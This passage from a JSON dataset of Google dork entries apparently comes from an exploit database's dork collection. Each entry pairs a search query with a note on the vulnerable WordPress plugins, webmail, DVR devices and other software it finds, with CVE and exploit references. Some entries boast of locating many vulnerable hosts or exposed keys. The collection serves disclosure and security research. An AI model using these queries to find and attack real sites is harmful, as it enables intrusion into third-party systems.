Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10241\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/sportspress", "description": "Dork: inurl:wp-content/plugins/elementor\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the elementor wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10257\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:\"wp-contentpluginsphoto-gallery\"", "description": "# Google Dork: inurl:\"\\wp-content\\plugins\\photo-gallery\"\r\n\r\n# WordPress Plugin Photo Gallery 1.5.34 - SQL Injection. This dork is\r\nlinked to the following existing exploit (CVE : 2019-16119) :\r\nhttps://www.exploit-db.com/exploits/47371\r\n\r\n# Date: 2020-06-09\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "index of /wp-content/uploads/backupbuddy", "description": "Dork: index of /wp-content/uploads/backupbuddy\r\nDescription: This google dork lists out the WordPress backupbuddy.zip file\r\nAuthor: Abhinav Porwal"}, {"dork": "inurl:wp-content/plugins/brizy", "description": "Dork: inurl:wp-content/plugins/brizy\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the brizy wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10261\r\nAuthor: Abhi Chitkara"}, {"dork": "\"powered by Typo3\"", "description": "Dork: \"powered by Typo3\"\r\n\r\nDescription: This google dork lists out the \"powered by Typo3\" sites\r\nReference: https://www.cvedetails.com/cve/CVE-2019-12748/\r\n\r\nAuthor: Abhinav Porwal"}, {"dork": "\"index of\" \"plugins/wp-rocket\"", "description": "Google Dork: \"index of\" \"plugins/wp-rocket\"\r\nCategory: Advisories and Vulnerabilities\r\nAuthor: Prashant Sharma\r\nLinkedIn: https://www.linkedin.com/in/prashantique/"}, {"dork": "intext:powered by JoomSport - sport WordPress plugin", "description": "# Google Dork: intext:powered by JoomSport - sport WordPress plugin\r\n# JoomSport 3.3 \u2013 for Sports - SQL injection. This dork is linked to the\r\n# following existing exploit (CVE : 2019-14348) :\r\n# https://www.exploit-db.com/exploits/47210\r\n# Date: 2020-06-10\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:wp-content/themes/newspaper", "description": "Dork: inurl:wp-content/themes/newspaper\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the newspaper wordpress theme. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10253\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/elementor", "description": "Dork: inurl:wp-content/plugins/elementor\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the elementor wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10256\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/kingcomposer", "description": "Dork: inurl:wp-content/plugins/kingcomposer\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the king composer wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10270\r\nAuthor: Abhi Chitkara"}, {"dork": "intext:\"TopManage (R) 2002 - 2020\"", "description": "# Google Dork: intext:\"TopManage \u00ae 2002 - 2020\"\r\n# OLK Web Store 2020 - Cross-Site Request Forgery. This dork is linked to\r\n# the following existing exploit: https://www.exploit-db.com/exploits/47960\r\n# Date: 05/06/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intext:Basato su IceWarp Server", "description": "# Dork: intext:Basato su IceWarp Server\r\n# IceWarp WebMail 11.4.4.1 and older version - Reflective Cross-Site\r\nScripting.\r\n# This dork is linked to the following existing exploit:\r\n# https://www.exploit-db.com/exploits/47988\r\n\r\n[*] CVE: CVE-2020-8512\r\n[*] Date: 17/06/2020\r\n[*] Author: Sagar Yadav"}, {"dork": "inurl:wp-content/plugins/testimonial-rotator", "description": "Dork: inurl:wp-content/plugins/testimonial-rotator\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the testimonial rotator wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10272\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:qdPM 9.1. Copyright (c) 2020 qdpm.net", "description": "# Google Dork: intitle:qdPM 9.1. Copyright \u00a9 2020 qdpm.net\r\n# qdPM 9.1 - Remote Code Execution. This dork is linked to the following\r\n# existing exploit (CVE : CVE-2020-7246):\r\n# https://www.exploit-db.com/exploits/47954\r\n# Date: 18/06/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intext:Basato su Comunicazioni Integrate IceWarp", "description": "[*] Google Dork:- intext:Basato su Comunicazioni Integrate IceWarp\r\n[*] IceWarp WebMail 11.4.4.1 and older version - Reflective Cross-Site\r\nScripting.\r\n[*]This dork is linked to the following existing exploit:\r\nhttps://www.exploit-db.com/exploits/47988\r\n[*] CVE: CVE-2020-8512\r\n[*] Date: 17/06/2020\r\n[*] Author: Sagar Yadav"}, {"dork": "inurl:/webmail intext:Tecnologia fornecida por IceWarp Server", "description": "# Google Dork: inurl:/webmail intext:Tecnologia fornecida por IceWarp Server\r\n# IceWarp WebMail 11.4.4.1 and older version - Reflective Cross-Site Scripting.\r\n# This dork is linked to the following existing exploit:\r\n# https://www.exploit-db.com/exploits/47988\r\n\r\n[*] CVE: CVE-2020-8512\r\n[*] Date: 23/06/2020\r\n[*] Author: Vanshal Gaur\r\n[*] Twitter: VanshalG"}, {"dork": "inurl:wp-content/plugins/wp-pro-quiz", "description": "Dork: inurl:wp-content/plugins/wp-pro-quiz\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the wp-pro quiz wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10278\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/YITH-WooCommerce-Ajax-Product-Filter", "description": "Dork: inurl:wp-content/plugins/YITH-WooCommerce-Ajax-Product-Filter\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the YITH-WooCommerce-Ajax-Product-Filter wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10281\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/ar-contactus", "description": "Dork: inurl:wp-content/plugins/ar-contactus\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the ar contactus wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10277\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/wpDiscuz", "description": "# Google Dork: inurl:wp-content/plugins/wpDiscuz\r\n# This google dork lists out Advisories and Vulnerabilities regarding\r\n# the wpDiscuz plugin. Ref: https://wpvulndb.com/vulnerabilities/10273\r\n\r\n[*] wpDiscuz < 5.3.6 - Unauthenticated SQL Injection\r\n[*] Author: Pankaj Verma (_p4nk4j)\r\n[*] LinkedIn: https://www.linkedin.com/in/p4nk4jv/"}, {"dork": "intext:\"Centreon 2005-2019\"", "description": "# Dork :intext:\"Centreon 2005-2019\"\r\n# Vulnerable Service\r\n# CVE-2019-13024\r\n# Author : Ambadi MP"}, {"dork": "inurl:wp-content/themes/citybook", "description": "Dork: inurl:wp-content/themes/citybook\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the citybook wordpress theme. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10275\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/themes/traveler", "description": "Dork: inurl:wp-content/themes/traveler\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the traveler wordpress theme. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10276\r\nAuthor: Abhi Chitkara"}, {"dork": "intext:Powered by 2Moons 2009-2013", "description": "# Google Dork: intext:Powered by 2Moons 2009-2013\r\n# 2Moons - Multiple Vulnerabilities\r\n# This dork is linked to the following existing exploit:\r\n# https://www.exploit-db.com/exploits/37713\r\n\r\n\r\n[*] Date: 26/06/2020\r\n[*] Twitter Handle: VanshalG\r\n[*] Author: Vanshal Gaur"}, {"dork": "inurl:wp-content/plugins/form-maker", "description": "Google Dork: inurl:wp-content/plugins/form-maker \r\nThis google dork lists out Advisories and Vulnerabilities regarding the *Form\r\nmaker by 10Web *plugin.\r\nRef: https://wpvulndb.com/vulnerabilities/10237\r\nForm Maker by 10Web < 1.13.36 - Authenticated SQL Injection\r\n\r\nAuthor: Ritik Kumar Jain (Dasagreeva)\r\nLinkedIn: https://www.linkedin.com/in/ritik-kumar-jain-57675419b/"}, {"dork": "intitle:\"IceWarp WebClient\"", "description": "# Dork :intitle:\"IceWarp WebClient\"\r\n# IceWarp WebClient Login panel\r\n# Author : Ambadi MP"}, {"dork": "inurl:wp-content/plugins/coming-soon", "description": "Google Dork: inurl:wp-content/plugins/coming-soon\r\nThis google dork lists out Advisories and Vulnerabilities regarding\r\nthe coming soon page,maintenance and under construction pages.\r\nRef:https://wpvulndb.com/vulnerabilities/10283\r\nComing Soon Page, Under Construction & Maintenance Mode by SeedProd < 5.1.2\r\n- Authenticated Stored Cross Site Scripting (XSS)\r\n\r\n\r\nAuthor: Ritik Kumar Jain (Dasagreeva)\r\nLinkedIn: https://www.linkedin.com/in/ritik-kumar-jain-57675419b/"}, {"dork": "inurl:wp-content/themes/traveler", "description": "Google Dork: inurl:wp-content/themes/traveler\r\nThis google dork lists out Advisories and Vulnerabilities regarding the\r\nTravel Booking themes.\r\nRef:https://wpvulndb.com/vulnerabilities/10276\r\n*Travel Booking < 2.8.2 - Unauthenticated Reflected XSS*\r\nAuthor: Ritik Kumar Jain (Dasagreeva)\r\nLinkedIn: https://www.linkedin.com/in/ritik-kumar-jain-57675419b/"}, {"dork": "inurl:wp-content/plugins/gift", "description": "Google Dork:inurl:wp-content/plugins/gift\r\nThis google dork lists out Advisories and Vulnerabilities regarding all\r\nplugins for the gift card and gift vouchers pages.\r\nRef:\r\n1.WordPress Plugin Gift Voucher 1.0.5 - (Authenticated) 'template_id' SQL\r\nInjection\r\n https://www.exploit-db.com/exploits/45255\r\n2.WooCommerce Smart Coupons < 4.6.5 - Unauthenticated Coupon Creation\r\n https://wpvulndb.com/vulnerabilities/10109\r\n3. Gift Certificate Creator"}, {"dork": "intext:piwik \"Sign in\"", "description": "# Dork: intext:piwik \"Sign in\"\r\n# PIWIK LOGIN PAGES\r\n# Author : Pierguido Iezzi"}, {"dork": "inurl:wp-content/themes/nexos", "description": "Dork: inurl:wp-content/themes/nexos\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the nexos wordpress theme. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10285\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/themes/careerfy", "description": "Dork: inurl:wp-content/themes/careerfy\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the careerfy wordpress theme. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10291\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/security-malware-firewall", "description": "Dork: inurl:wp-content/plugins/security-malware-firewall\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the security-malware-firewall wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10292\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/themes/careerup", "description": "Dork: inurl:wp-content/themes/careerup\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the careerup wordpress theme. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10289\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/testimonials-widget", "description": "Dork: inurl:wp-content/plugins/testimonials-widget\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the testimonials-widget wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10288\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/wp-jobsearch", "description": "Dork: inurl:wp-content/plugins/wp-jobsearch\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the wp-jobsearch wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10290\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/payment-form-for-paypal-pro", "description": "Dork: inurl:wp-content/plugins/payment-form-for-paypal-pro\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the payment-form-for-paypal-pro wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10287\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/wpforms-lite", "description": "Description: inurl:wp-content/plugins/wpforms-lite\r\n\r\nThis google dorks give us the advisories and vulnerabilities on wordpress\r\nplugins.\r\n\r\nRef: https://wpvulndb.com/vulnerabilities/10286"}, {"dork": "allintext:wp-content/plugins/acf-to-rest-api", "description": "Description: allintext:wp-content/plugins/acf-to-rest-api\r\nThis google dorks give us the advisories and vulnerabilities on wordpress\r\nplugins.\r\n\r\nRef: https://wpvulndb.com/vulnerabilities/10284\r\n\r\nLinkedin : https://www.linkedin.com/in/peaceonmind/\r\n\r\nThanks,\r\nTanmay Bhattacharjee"}, {"dork": "inurl:wp-content/themes/sparky", "description": "Dork: inurl:wp-content/themes/sparky\r\n\r\nDescription: This google dorks give us the advisories and vulnerabilities\r\non WordPress Themes.\r\nRef.: https://wpvulndb.com/vulnerabilities/7338\r\nAuthor: Abhinav Porwal"}, {"dork": "inurl:wp-content/plugins/wp-live-chat-support", "description": "Dork: inurl:wp-content/plugins/wp-live-chat-support\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the wp-live-chat-support wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10303\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/form-maker", "description": "Dork: inurl:wp-content/plugins/form-maker\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the form-maker wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10305\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/newsletter", "description": "Dork: inurl:wp-content/plugins/newsletter\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the newsletter wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10304\r\nAuthor: Abhi Chitkara"}, {"dork": "allintext: wp-content/themes/injob", "description": "Description: allintext: wp-content/themes/injob\r\nThis google dorks give us the advisories and vulnerabilities on wordpress\r\nplugins.\r\n\r\nRef: https://wpvulndb.com/vulnerabilities/10302\r\n\r\nThanks,\r\nTanmay Bhattacharjee"}, {"dork": "inurl:wp-content/plugins/knight-lab-timelinejs", "description": "Description: inurl:wp-content/plugins/knight-lab-timelinejs\r\n\r\nThis google dorks give us the advisories and vulnerabilities on wordpress\r\nplugins.\r\n\r\nRef: https://wpvulndb.com/vulnerabilities/10298\r\n\r\nThanks,\r\nTanmay Bhattacharjee"}, {"dork": "inurl:wp-content/plugins/wise-chat", "description": "Description: inurl:wp-content/plugins/wise-chat\r\n\r\nThis google dorks give us the advisories and vulnerabilities on wordpress\r\nplugins.\r\n\r\nRef: https://wpvulndb.com/vulnerabilities/10299\r\n\r\nThanks,\r\nTanmay Bhattacharjee"}, {"dork": "inurl:wp-content/plugins/kingcomposer", "description": "Dork: inurl:wp-content/plugins/kingcomposer\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the kingcomposer wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/9265\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/knight-lab-timelinejs", "description": "Dork: inurl:wp-content/plugins/knight-lab-timelinejs\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the knight-lab-timelinejs wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10298\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/gravityforms", "description": "Dork: inurl:wp-content/plugins/gravityforms\r\n\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the gravity forms wordpress plugin.\r\n\r\nRef: https://wpvulndb.com/vulnerabilities/10252\r\n\r\nAuthor: Lokesh S"}, {"dork": "allintext:wp-content/plugins/angwp", "description": "Description:allintext:wp-content/plugins/angwp\r\nThis google dorks give us the advisories and vulnerabilities on wordpress\r\nplugins.\r\n\r\nRef: https://wpvulndb.com/vulnerabilities/10293\r\n\r\nThanks,\r\nTanmay Bhattacharjee"}, {"dork": "inurl:wp-content/plugins/angwp", "description": "Description: inurl:wp-content/plugins/angwp\r\nThis google dorks give us the advisories and vulnerabilities on wordpress\r\nplugins.\r\n\r\nRef: https://wpvulndb.com/vulnerabilities/10293\r\n\r\n\r\nThanks,\r\nTanmay Bhattacharjee"}, {"dork": "inurl:wp-content/themes/corona", "description": "Dork: inurl:wp-content/themes/corona\r\n\r\nDescription: This google dorks give us the advisories and vulnerabilities\r\non WordPress Themes.\r\n\r\nRef.: https://wpvulndb.com/vulnerabilities/7345\r\n\r\nAuthor: Abhinav Porwal"}, {"dork": "inurl:/wp-content/themes/realestate-7", "description": "Dork : inurl:/wp-content/themes/realestate-7\r\n\r\nDescription : This google dork lists out Advisories and Vulnerabilities\r\nregarding the realestate-7 wordpress theme.\r\n\r\nRef: https://wpvulndb.com/vulnerabilities/10024 ,\r\nhttps://wpvulndb.com/vulnerabilities/9492\r\n\r\nReal Estate 7 < 2.9.5 - Multiple Vulnerabilities\r\nReal Estate 7"}, {"dork": "inurl:/wp-content/plugins/angwp", "description": "Google Dork: inurl:/wp-content/plugins/angwp\r\nThis google dork lists out Advisories and Vulnerabilities regarding Adning\r\nAdvertising plugin.\r\nRef: https://wpvulndb.com/vulnerabilities/10293\r\nAdning Advertising < 1.5.6 - Unauthenticated Arbitrary File Upload/Deletion\r\nAuthor: Ritik Kumar Jain (Dasagreeva)\r\nLinkedIn: https://www.linkedin.com/in/ritik-kumar-jain-57675419b/\r\nTwitter: https://twitter.com/Dasagreeva1"}, {"dork": "inurl:wp-content/plugins/angwp", "description": "Dork: inurl:wp-content/plugins/angwp\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the angwp wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10293\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/wd-google-maps", "description": "DORK: inurl:wp-content/plugins/wd-google-maps\r\n\r\nhttps://wpvulndb.com/vulnerabilities/10099\r\n\r\nThis google dork gives us the advisories and vulnerabilities on wordpress\r\nplugins\r\n\r\nThanks,\r\nSachin"}, {"dork": "inurl:wp-content/plugins/sendpress", "description": "Dork: inurl:wp-content/plugins/sendpress\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the sendpress wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10317\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/wpjobboard", "description": "DORK: inurl:wp-content/plugins/wpjobboard\r\n\r\nhttps://wpvulndb.com/vulnerabilities/10113\r\n\r\nThis google dork gives us the advisories and vulnerabilities on wordpress\r\nplugins\r\n\r\nThanks,\r\nSachin"}, {"dork": "inurl:wp-content/plugins/idx-broker-platinum", "description": "DORK: inurl:wp-content/plugins/idx-broker-platinum\r\n\r\nhttps://wpvulndb.com/vulnerabilities/10153\r\n\r\nThis google dork gives us the advisories and vulnerabilities on wordpress\r\nplugins\r\n\r\n\r\nThanks,\r\nSachin"}, {"dork": "inurl:wp-content/plugins/async-javascript", "description": "DORK: inurl:wp-content/plugins/async-javascript\r\n\r\nhttps://wpvulndb.com/vulnerabilities/10098\r\n\r\nThis google dork gives us the advisories and vulnerabilities on wordpress\r\nplugins\r\n\r\n\r\nThanks,\r\nSachin"}, {"dork": "inurl:wp-content/plugins/all-in-one-wp-migration", "description": "DORK: inurl:wp-content/plugins/all-in-one-wp-migration\r\n\r\nhttps://wpvulndb.com/vulnerabilities/10151\r\n\r\nThis google dork gives us the advisories and vulnerabilities on wordpress\r\nplugins\r\n\r\n\r\nThanks,\r\nSachin"}, {"dork": "inurl:wp-content/plugins/lifterlms", "description": "DORK: inurl:wp-content/plugins/lifterlms\r\n\r\nhttps://wpvulndb.com/vulnerabilities/10159\r\n\r\nThis google dork gives us the advisories and vulnerabilities on wordpress\r\nplugins\r\n\r\nThanks,\r\nSachin"}, {"dork": "inurl:wp-content/plugins/arforms", "description": "DORK: inurl:wp-content/plugins/arforms\r\n\r\nhttps://wpvulndb.com/vulnerabilities/\r\n9139\r\n\r\n\r\nThis google dork gives us the advisories and vulnerabilities on wordpress\r\nplugins\r\n\r\nThanks,\r\nSachin"}, {"dork": "inurl:wp-content/plugins/safe-svg", "description": "DORK: inurl:wp-content/plugins/safe-svg\r\n\r\nhttps://wpvulndb.com/vulnerabilities/\r\n9942\r\n\r\n\r\nThis google dork gives us the advisories and vulnerabilities on wordpress\r\nplugins\r\n\r\n\r\nThanks,\r\nSachin"}, {"dork": "inurl:wp-content/plugins/sfwd-lms", "description": "DORK: inurl:wp-content/plugins/sfwd-lms\r\n\r\nhttps://wpvulndb.com/vulnerabilities/\r\n10461\r\n\r\nThis google dork gives us the advisories and vulnerabilities on wordpress\r\nplugins\r\n\r\n\r\nThanks,\r\nSachin"}, {"dork": "inurl:wp-content/plugins/iwp-client", "description": "DORK: inurl:wp-content/plugins/iwp-client\r\n\r\nhttps://wpvulndb.com/vulnerabilities/\r\n10011\r\n\r\n\r\nThis google dork gives us the advisories and vulnerabilities on wordpress\r\nplugins\r\n\r\nThanks,\r\nSachin"}, {"dork": "inurl:wp-content/plugins/email-subscribers", "description": "DORK:inurl:wp-content/plugins/email-subscribers\r\n\r\nhttps://wpvulndb.com/vulnerabilities/\r\n10322\r\n\r\nThis google dork gives us the advisories and vulnerabilities on wordpress\r\nplugins"}, {"dork": "intitle:ePMP 1000 intext:Log In -site:*.com -site:com.*", "description": "Hello!\r\nI have found a google dork to find ePMP 1000 devices. ePMP 1000 is\r\nvulnerable to command execution and changing of administrator credentials\r\nYou can find a lot of vulnerable hosts with this google dork.\r\n\r\nHave a nice day!"}, {"dork": "inurl:wp-content/plugins/redirection", "description": "Dork: inurl:wp-content/plugins/redirection\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the redirection wordpress plugin.\r\nRef: https://wpvulndb.com/vulnerabilities/9844\r\nAuthor: Lokesh S"}, {"dork": "inurl:wp-content/plugins/updraftplus", "description": "Dork: inurl:wp-content/plugins/updraftplus\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the updraftplus wordpress plugin.\r\nRef: https://wpvulndb.com/vulnerabilities/9843\r\nAuthor: Lokesh S"}, {"dork": "inurl:wp-content/plugins/my-calendar", "description": "Dork: inurl:wp-content/plugins/my-calendar\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the my calendar wordpress plugin.\r\nRef: https://wpvulndb.com/vulnerabilities/9267\r\nAuthor: Lokesh S"}, {"dork": "Index of : wp-content/plugins/wpmudev-updates/", "description": "Google Dork : Index of : wp-content/plugins/wpmudev-updates/\r\n\r\nDescription: This dork will lead to getting the keys and much more\r\nsensitive information of the directory.\r\n(Sensitive Data Exposure).\r\n\r\nAuthor : Pratik Khalane\r\n\r\nDate: 23-07-2020"}, {"dork": "inurl:\"/vam/index_vam_op.php\"", "description": "# Google Dork: inurl:\"/vam/index_vam_op.php\"\r\n\r\n# Virtual Airlines Manager 2.6.2 - Persistent Cross-Site Scripting. This\r\ndork is linked to the following existing exploit:\r\nhttps://www.exploit-db.com/exploits/48715\r\n\r\n# Date: 27/07/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:wp-content/plugins/easy-media-gallery-pro", "description": "Dork: inurl:wp-content/plugins/easy-media-gallery-pro\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the easy media gallery pro wordpress plugin.\r\nRef: https://wpvulndb.com/vulnerabilities/7545\r\nAuthor: Lokesh S"}, {"dork": "inurl:wp-content/plugins/wpdiscuz", "description": "Dork: inurl:wp-content/plugins/wpdiscuz\r\nDescription: This google dork lists out Advisories and Vulnerabilities regarding the wpdiscuz wordpress plugin.\r\nRef: \u200f\u2068https://wpvulndb.com/vulnerabilities/10333\u2069 \u200f\r\nAuthor: Gal Nagli"}, {"dork": "inurl:''com_gmapfp''", "description": "# Google Dork: inurl:''com_gmapfp''\r\n\r\n# Joomla! Component GMapFP 3.30 - Arbitrary File Upload. This dork is\r\nlinked to the following existing exploit:\r\nhttps://www.exploit-db.com/exploits/48248\r\n\r\n# Date: 31/07/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl: login.rsp", "description": "# Google Dork: inurl: login.rsp\r\n# Date: 27/08/2020\r\n# Exploit Author: Shreyas Gujar\r\n# CVE : CVE-2018-9995\r\n\r\n# Description: The CVE-2018-9995 vulnerability against IoT devices. It is\r\nable to extract account credentials of DVR devices thereby accessing the\r\ndevices and their video feeds.\r\n\r\nThanks and best regards\r\nShreyas Gujar\r\n\r\nhttps://twitter.com/shreyasrx?s=09"}, {"dork": "inurl:\"/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php\" - Wordpress File Manager", "description": "dork: inurl:\"/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php\"\r\nAuthor: bt0\r\nreferences:\r\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25213\r\nhttps://wpvulndb.com/vulnerabilities/10389\r\n\r\nDescription:\r\n\r\nSeravo noticed multiple cases where WordPress sites were breached using 0-day in wp-file-manager (confirmed with v6.8, which was the latest version available in wordpress.org).\r\nFile lib/php/connector.minimal.php can be by default opened directly, and this file loads lib/php/elFinderConnector.class.php which reads POST/GET variables, and then allows executing some internal features, like uploading files. PHP is allowed, thus this leads to unauthenticated arbitrary file upload and remote code execution.\r\nIt seems that this vulnerability was originally discovered and published publicly on Twitter on August 26th (see references), and was later seen being exploited in the wild by Seravo.\r\n\r\nBest regards,\r\nbt0"}, {"dork": "inurl:device ext:rsp", "description": "Google Dork: inurl:device ext:rsp\r\n\r\nCVE: CVE-2018-9995 \r\n\r\nDescription: The CVE-2018-9995 vulnerability against IoT\r\ndevices. It is able to extract account credentials of DVR, MVR, MDVR, XVR,\r\nNVR etc devices thereby accessing the devices and their video feeds.\r\n\r\nAuthor : Sibi Mathew George"}, {"dork": "inurl:\"images/lists?cid=13\"", "description": "# Google Dork: inurl:\"images/lists?cid=13\"\r\n\r\n# MSVOD 10 - 'cid' SQL Injection. CVE : CVE-2018-14418.\r\nhttps://www.exploit-db.com/exploits/45062\r\n\r\n# Date: 17/09/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intext:\"Powered by Piwigo\"", "description": "# Google Dork: intext:\"Powered by Piwigo\"\r\n\r\n# CVE-2020-9467. Piwigo 2.10.1 - Cross Site Scripting.\r\nhttps://www.exploit-db.com/exploits/48814\r\n\r\n# Date: 2/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intext:\"Powered by Typesetter\"", "description": "# Google Dork: intext:\"Powered by Typesetter\"\r\n\r\n# Typesetter CMS 5.1 - 'Site Title' Persistent Cross-Site Scripting.\r\nhttps://www.exploit-db.com/exploits/48852\r\n\r\n# Date: 2/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intext:\"Published with Textpattern CMS\"", "description": "# Google Dork: intext:\"Published with Textpattern CMS\"\r\n\r\n# Textpattern CMS 4.6.2 - 'body' Persistent Cross-Site Scripting.\r\nhttps://www.exploit-db.com/exploits/48861\r\n\r\n# Date: 9/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/wp-content/plugins/wp-file-manager/readme.txt", "description": "Dork to find CVE-2020\u201325213\r\n\r\n\" inurl:/wp-content/plugins/wp-file-manager/readme.txt \"\r\n\r\nBest Regards,\r\nKathan"}, {"dork": "intitle:\"Sphider Admin Login\"", "description": "# Google Dork: intitle:\"Sphider Admin Login\"\r\n\r\n# Sphider Search Engine 1.3.6 - Multiple Vulnerabilities.\r\n https://www.exploit-db.com/exploits/48957\r\n https://www.exploit-db.com/exploits/34189\r\n\r\n# Date: 27/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "Server: Mida eFramework", "description": "# Google Dork: Server: Mida eFramework\r\n\r\n# Mida eFramework 2.9.0 - Back Door Access.\r\nCVE : CVE-2020-15921. https://www.exploit-db.com/exploits/48823\r\nMida eFramework 2.9.0 - Remote Code Execution.\r\nCVE : CVE-2020-15920. https://www.exploit-db.com/exploits/48768\r\nMida eFramework 2.8.9 - Remote Code Execution\r\nCVE : CVE-2020-15922. https://www.exploit-db.com/exploits/48835\r\n\r\n# Date: 29/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Powered by Pro Chat Rooms\"", "description": "# Google Dork: intitle:\"Powered by Pro Chat Rooms\"\r\n# Pro Chat Rooms v8.2.0 - Multiple Vulnerabilities. CVE-2014-5275, CVE-2014-5276. https://www.exploit-db.com/exploits/34275\r\n# Date: 29/10/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:\"woocommerce-exporter\"", "description": "# Google Dork: inurl:\"woocommerce-exporter\"\r\n# WooCommerce Store Exporter v1.7.5 Stored XSS. https://www.exploit-db.com/exploits/34424\r\n# Date: 29/10/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:opac_css", "description": "# Google Dork: inurl:opac_css\r\n# PMB 5.6 - 'chemin' Local File Disclosure.\r\n# https://www.exploit-db.com/exploits/49054\r\n# Date: 17/11/2020\r\n# 